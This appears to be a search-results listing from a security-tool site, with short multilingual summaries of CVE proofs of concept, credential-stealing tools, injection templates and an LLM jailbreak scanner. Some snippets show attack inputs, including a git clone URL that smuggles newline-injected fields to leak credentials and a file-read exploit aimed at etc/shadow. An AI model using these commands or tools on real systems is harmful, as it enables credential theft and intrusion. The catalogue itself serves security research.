25696 matches found
garak
garak, escáner de vulnerabilidades de LLM Kit de Red-teaming y Evaluación de IA Generativa garak verifica si un LLM puede ser inducido a fallar de una manera no deseada. garak busca alucinaciones, fugas de datos, inyección de prompts, desinformación, generación de toxicidad, jailbreaks y muchas...
CVE-2023-23397-POC-Powershell
CVE-2023-23397-POC-Powershell 脚本函数,用于通过 ReminderSoundFile 选项发送或保存日历 NTLM 泄露。 运行脚本以在 Powershell 中加载函数,然后可以使用下面的示例作为使用函数的起点。 需要在安装了 Outlook 的 Windows 机器上运行,因为它使用 Outlook COM 对象发送电子邮件。 注意,它将从 Outlook 关联的电子邮件账户发送。当前函数会将会议开始时间设置为脚本执行时,持续 2 小时。 发送: root@kitploit: Send-CalendarNTLMLeak -recipient...
Koh
Koh Koh는 의도적인 토큰/로그온 세션 유출을 통해 사용자 자격 증명 자료를 캡처할 수 있는 C 및 BOFBeacon Object File 도구 모음입니다. 일부 코드는 Elad Shamir의 Internal-Monologue 프로젝트라이선스 없음와 KB180548에서 영감을 받았습니다. 이것이 가능한 이유와 Koh의 접근 방식에 대해서는 이 README의 기술적 배경 섹션을 참조하세요. Koh의 동기와 접근 방식에 대한 더 자세한 설명은 Koh: The Token Stealer 게시물을 참조하세요. @harmj0y가 이 ...
CVE-2021-30357_CheckPoint_SNX_VPN_PoC
CVE-2021-30357CheckPointSNXVPNPoC 针对通过 CheckPoint SNX VPN Linux 客户端进行特权文件读取的概念验证(PoC)。 受影响版本 CheckPointVPNSNXLinux800007075.sh MD5 校验和:4372e9936e2dfb1d1ebcef3ed4dd7787 漏洞利用 要利用此漏洞,只需使用 -f 参数将任意文件作为 SNX 配置加载。如果该文件不是有效的 SNX 配置,程序将抛出错误并显示语法错误,从而泄露文件内容,直到找到字符串终止符(例如 etc/shadow): root@kitploit: $...
Instagram-Notes-Audio-Leakage-via-URL-Extraction-Fixed
🎙️ Fuga de audio de Notas de Instagram mediante extracción de URL Solucionado y recompensado 🛡️ Resumen de la vulnerabilidad En 05/2025, descubrí una vulnerabilidad en Instagram Web que permitía a cualquier usuario extraer el archivo de video original de una Nota y acceder al audio de fondo , que...
droidbox
简介 DroidBox 是为 Android 应用程序提供动态分析而开发的。分析完成后,生成的结果会描述以下信息: 分析包的哈希值 传入/传出网络数据 文件读写操作 通过 DexClassLoader 启动的服务和加载的类 通过网络、文件和短信泄露的信息 被绕过的权限 使用 Android API 执行的加密操作 广播接收器列表 发送的短信和电话 此外,还会生成两个图表来可视化该包的行为。一个显示操作的时间顺序,另一个是树图,可用于检查分析包之间的相似性。 安装指南 以下是让 DroidBox 运行的指南。该发布版本仅在 Linux 和 Mac OS 上测试过。如果你没有 Android...
ecs_checker
EDNS客户端子网远程检测工具 - CVE-2025-40766 本工具用于检查远程DNS解析器是否支持EDNS客户端子网(ECS) ——这是一个DNS扩展,可能使系统暴露于缓存投毒或信息泄露漏洞(例如CVE-2025-40766)。 🔍 功能简介 发送带有ECS选项的DNS查询 检测目标DNS解析器是否启用了ECS 兼容Linux/macOS Python 和 Windows PowerShell 💻 使用方法 Python 安装依赖: root@kitploit: pip3 install -r requirements.txt 运行脚本: root@kitploit: python...
CVE-2026-82639
NextChat versions 2.15.8 through 2.16.1 are affected by an improper URL validation flaw in the proxy endpoint . The x-base-url header is validated via substring matching rather than proper hostname parsing, so any attacker-supplied URL containing the string api.openai.com passes validation. This ...
Gui-poc-test
Gui-poc-test A testing tool for CobaltStrike-RCE:CVE-2022-39197; Weblogic-RCE:CVE-2023-21839; MinIO:CVE-2023-28432 对这三种漏洞的图形化漏洞检测和利用工具 注意事项 1.运行jar需java8 2.针对单目标,不适用多ip漏扫 3.打包时weblogic漏洞利用需引用wlfullclient.jar,需自行添加 Usage java -jar Gui-poc-test.jar 使用方法:有检测和利用两个按钮,漏洞不同的使用方法工具界面有提示 MinIO 信息泄露:...
androguard
Androguard Do you think your phone has been pwned ? please check IsMyPhonePwned New tool: Goauld Dynamic injection tool for Linux/Android See the new version of Androguard: https://github.com/androguard/androguard/tree/ng Installation Quick installation: root@kitploit: pip install androguard...
CVE-2020-5260
CVE-2020-5260 CVE-2020-5260演示记录 git在执行类似"git clone https://example.com" 这样的命令时,会请求使用协议"https"存储主机"example.com"的凭据,并在远程端请求身份验证时将返回的凭据附加到发出的请求中 root@kitploit: git clone 'http://localhost:8088/%0ahost=github.com%0aprotocol=https 参考链接: https://bugs.chromium.org/p/project-zero/issues/detail?id=2021...
gitrecon
gitrecon OSINT 工具,用于从 Github 或 Gitlab 个人资料获取信息,并查找在提交中泄露的用户电子邮件地址。 📚 这是如何工作的? GitHub 使用与 GitHub 帐户关联的电子邮件地址将提交和其他活动链接到 GitHub 个人资料。当用户对公共仓库进行提交时,他们的电子邮件地址通常会出现在提交中,如果你知道在哪里查找,这些信息就会公开可访问。 GitHub 提供了一些说明,介绍如何防止这种情况发生,但似乎大多数 GitHub 用户要么不知道,要么不关心他们的电子邮件地址可能会被暴露。 查找 GitHub 用户的电子邮件地址通常就像通过 GitHub API...
smalien
Smalien Smalien是一款面向Android应用分析人员的信息流分析和信息泄露检测工具。Smalien可以在Linux机器上对Android应用进行静态污点分析,同时也能在Android设备上运行时执行动态污点分析、检测因隐式信息流导致的信息泄露,并强制执行隐私策略。 注意 : Smalien的新版本现已发布在 SaitoLab-Nitech/VTDroid !! Smalien具有以下功能 对Android应用进行静态分析,收集类、方法、变量等信息。 以图形方式呈现分析结果,例如方法调用图和信息流图。 在Android设备上执行动态污点分析。 强制执行由分析人员指定的隐私策略...
OptionsBleed-POC-Scanner
OptionsBleed-POC-Scanner OptionsBleed CVE-2017-9798 PoC / Escáner Más información próximamente... Descargo de responsabilidad Este software ha sido creado únicamente con fines de investigación académica y para el desarrollo de técnicas defensivas efectivas, y no está destinado a ser utilizado par...
Microsoft-Edge-Information-Disclosure
Microsoft-Edge-Information-Disclosure CVE-2024-30056 Microsoft Edge Chromium-based Information Disclosure Vulnerability This is a vulnerability in Microsoft Edge Chromium-based. The attacker was able to trick the user into revealing sensitive information without his knowledge. Poc: root@kitploit:...
74cms - ajax_officebuilding.php SQL Injection
A SQL injection vulnerability exists in 74cms 3.2.0 via the x parameter to ajaxofficebuilding.php. id: CVE-2020-22210 info: name: 74cms - ajaxofficebuilding.php SQL Injection author: ritikchaddha severity: critical description: | A SQL injection vulnerability exists in 74cms 3.2.0 via the x...
Joomla! Component redTWITTER 1.0 - Local File Inclusion
A drectory traversal vulnerability in the redTWITTER comredtwitter component 1.0.x including 1.0b11 for Joomla! allows remote attackers to read arbitrary files via a .. dot dot in the view parameter to index.php. id: CVE-2010-1983 info: name: Joomla! Component redTWITTER 1.0 - Local File Inclusio...
Jira Improper Authorization
The /rest/issueNav/1/issueTable resource in Jira before version 8.3.2 allows remote attackers to enumerate usernames via an incorrect authorisation check. id: CVE-2019-8446 info: name: Jira Improper Authorization author: dhiyaneshDk severity: medium description: The /rest/issueNav/1/issueTable...
Onair2 < 3.9.9.2 & KenthaRadio < 2.0.2 - Remote File Inclusion/Server-Side Request Forgery
Onair2 3.9.9.2 and KenthaRadio 2.0.2 have exposed proxy functionality to unauthenticated users. Sending requests to this proxy functionality will have the web server fetch and display the content from any URI, allowing remote file inclusion and server-side request forgery. id: CVE-2021-24472 info...
Users Ultra <= 3.1.0 - SQL Injection
The Users Ultra WordPress plugin through 3.1.0 fails to properly sanitize and escape the datatarget parameter before it is being interpolated in an SQL statement and then executed via the ratingvote AJAX action available to both unauthenticated and authenticated users, leading to an SQL Injection...